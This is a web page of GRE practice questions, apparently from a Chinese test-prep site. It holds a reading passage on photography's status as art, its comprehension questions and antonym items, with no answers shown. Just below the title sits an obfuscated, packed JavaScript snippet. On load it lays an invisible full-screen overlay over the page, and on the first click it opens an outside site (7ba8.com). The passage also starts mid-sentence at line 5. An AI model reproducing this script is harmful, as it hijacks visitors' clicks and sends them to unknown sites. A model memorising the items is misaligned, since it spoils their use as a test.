2006年GRE北美模拟试题(四)C

<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>(5) merely a practical art. Throughout the nineteenth
century, the defense of photography was identical with the
struggle to establish it as a fine art. Against the charge
that photography was a soulless, mechanical copying of real- 
ity, photographers asserted that it was instead a privileged
(10)way of seeing, a revolt against commonplace
vision, and no less worthy an art than painting. 
Ironically, now that photography is securely established 
as a fine art,many photographers find it pretentious or 
irrelevant to label it as such. Serious photographers vari-
(15)ously claim to be finding, recording, impartially observ- 
ing, witnessing events, exploring themselves-anything 
but making works of art. In te nineteenth century,
photography's association with the real world placed is 
in an ambivalent relation to art; late in the twentieth
(20)century, an ambivalent relation exists because of
the Modernist heritage in art. That important photographers 
are no longer willing to debate whether photography is 
or is not a fine art, except to proclaim that their own 
work is not involved with art, shows the extent to which
(25)they simply take for granted the concept of art imposed 
by the triumph of Modernism: the better the art, the 
more subversive it is of the traditional aims of art. 
Photographers' disclaimers of any interest in making 
art tell us more about the harried status of the contempo-
(30)rary notion of art than about whether photography is
or is not art. For example,those photographers who suppose 
that, by taking pictures, they are getting away from the 
pretensions of art as exemplified by painting remind us 
of those Abstract Expressionist painters who imagined
(35)they were getting away from the intellectual austerity
of classical Modernist painting by concentrating on the 
physical act of painting. Much of photography's prestige 
today derives from the convergence of its aims with those 
of recent art, particularly with the dismissal of abstract
(40)art implicit in the phenomenon of Pop painting during 
the 1960's. Appreciating photographs is a relief to sensi  
bilities tired of the mental exertions demanded by abstract
art. Classical Modernist painting-that is, abstract
art as developed in different ways by Picasso,
(45)Kandinsky, and Matisse-presupposes highly developed 
skills of looking and a familiarity with other paintings 
and the history of art. Photography, like Pop painting, 
reassures viewers that art is not hard; photography seems 
to be more about its subjects than about art.
(50)Photography,however,has developed all the anxieties 
and self-consciousness of a classic Modernist art. Many 
professionals privately have begun to worry that the pro- 
motion of photography as an activity subversive of the 
traditional pretensions of art has gone so far that the
(55)public will forget that photography is a distinctive
and exalted activity-in short,an art.
    21.In the passage, the author is primarily concerned with
  (A) defining the Modernist attitude toward art
  (B) explaining how photography emerged as a fine art after the controversies of the nineteenth century
  (C) explaining the attitudes of serious contemporary photographers toward photography as art and placing those attitudes in their historical context
  (D) defining the various approaches that serious contemporary photographers take toward their art and assessing the value of each of those approaches
  (E) identifying the ways that recent movements in painting and sculpture have influenced the techniques employed by serious photographers
  22.Which of the following adjectives best describes “the concept of art imposed by the triumph of Modernism“ as the author represents it in lines25-27?
  (A) Objective
  (B) Mechanical
  (C) Superficial
  (D) Dramatic
  (E) Paradoxical
  23. The author introduces Abstract Expressionist painters (lines 34) in order to
  (A) provide an example of artists who, like serious contemporary photographers, disavowed traditionally accepted aims of modern art
  (B) call attention to artists whose works often bear a physical resemblance to the works of serious contemporary photographers
  (C) set forth an analogy between the Abstract Expressionist painters and classical Modernist painters
  (D) provide a contrast to Pop artists and others who created works that exemplify the Modernist heritage in art
  (E) provide an explanation of why serious photog-raphy, like other contemporary visual forms,is not and should not pretend to be an art
  24.According to the author, the nineteenth——century defenders of photography mentioned in the passage stressed that photography was
  (A) a means of making people familiar with remote locales and unfamiliar things
  (B) a technologically advanced activity
  (C) a device for observing the world impartially
  (D) an art comparable to painting
  (E) an art that would eventually replace the traditional arts
    25.According to the passage, which of the following  best explains the reaction of serious contemporary photographers to the question of whether photography is an art?
  (A)The photographers' belief that their reliance on an impersonal machine to produce their art requires the surrender of the authority of their personal vision
  (B)The photographers' fear that serious photography may not be accepted as an art by the contemporary art public
  (C)The influence of Abstract Expressionist painting and Pop Art on the subject matter of the modern photograph
  (D)The photographers' belief that the best art is subversive of art as it has previously been defined
  (E)The notorious difficulty of defining art in its relation to realistic representation
  26.According to the passage, certain serious contemporary photographers expressly make which of the following claims about their photographs?
  (A)Their photographs could be created by almost anyone who had a camera and the time to devote to the activity.
  (B)Their photographs are not examples of art but are examples of the photographers' impartial observation of the world.
  (C)Their photographs are important because of
  their subjects but not because of the responses they evoke in viewers.
   (D)Their photographs exhibit the same ageless principles of form and shading that have been used in painting.
  (E) Their photographs represent a conscious glorification of the mechanical aspects of twentieth-century life.
  27.It can be inferred from the passage that the author most probably considers serious contemporary photography to be a
  (A) contemporary art that is struggling to be accepted as fine art
  (B) craft requiring sensitivity but by no means an art
  (C) mechanical copying of reality
  (D) modern art that displays the Modernist tendency to try to subvert the prevailing aims of art
  (E) modern art that displays the tendency of all Modernist art to become increasingly formal and abstract
    28.PREOCCUPATION:
  (A) finality
  (B) innocence
  (C) liberality
  (D) unconcern
  (E) tolerance
  29.CHROMATIC:
  (A) opaque
  (B) colorless
  (C) lengthy
  (D) profound
  (E) diffuse
  30.PEDESTRIAN:
  (A) widely known
  (B) strongly motivated
  (C) discernible
  (D) uncommon
  (E) productive
  31.EQUIVOCATE:
  (A) communicate straightforwardly
  (B) articulate persuasively
  (C) instruct exhaustively
  (D) study painstakingly
  (E) reproach sternly
  32.DENUDE:
  (A) crowd out
  (B) skim over
  (C) change color
  (D) cover
  (E) sustain
  33.RANCOR:
  (A) deference
  (B) optimism
  (C) courage
  (D) superiority
  (E) goodwill
  34. OSSIFIED:
  (A) vulnerable to destruction
  (B) subject to illusion
  (C) worthy of consideration
  (D) capable of repetition
  (E) amenable to change
  35. CONTROVERT:
  (A) substantiate
  (B) transform
  (C) ameliorate
  (D) simplify
  (E) differentiate
  36. PROTRACT:
  (A) thrust
  (B) reverse
  (C) curtail
  (D) disperse
   (E) forestall
  37. ABRADE:
  (A) unfasten
  (B) prolong
  (C) augment
  (D) extinguish
  (E) transmit
  38.APOLOGIST:
  (A) egotist
  (B) wrongdoer
  (C) freethinker
  (D) detractor
  (E) spendthrift
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